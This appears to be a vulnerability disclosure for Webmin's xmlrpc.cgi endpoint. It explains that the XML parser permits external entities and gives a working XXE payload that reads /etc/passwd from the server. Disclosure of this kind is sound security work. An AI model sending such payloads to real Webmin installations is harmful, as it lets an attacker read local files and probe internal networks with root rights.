Description
From http://www.webmin.com :
Webmin is a web-based interface for system administration for Unix. Using any modern web browser, you can setup user accounts, Apache, DNS, file sharing and much more. Webmin removes the need to manually edit Unix configuration files like /etc/passwd, and lets you manage a system from the console or remotely. See the standard modules page for a list of all the functions built into Webmin.
By default, endpoint xmlrpc.cgi is enabled with basic auth, but only 3 users can POST data :
- root ;
- admin ;
- sysadm.
As its name suggests, the service handle XML messages. The Perl XML::Parser is used, without preventing the use of entities :
Exploitation
Because of this permissive parser, a successfully logged attacker can exploit a XXE in order to retrieve local file or discover internal networks with root rights. Simple XXE payloads can be used, for exemple :
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE methodCall [
<!ENTITY file SYSTEM "file:///etc/passwd">
]>
<methodCall>
<methodName>&file;</methodName>
</methodCall>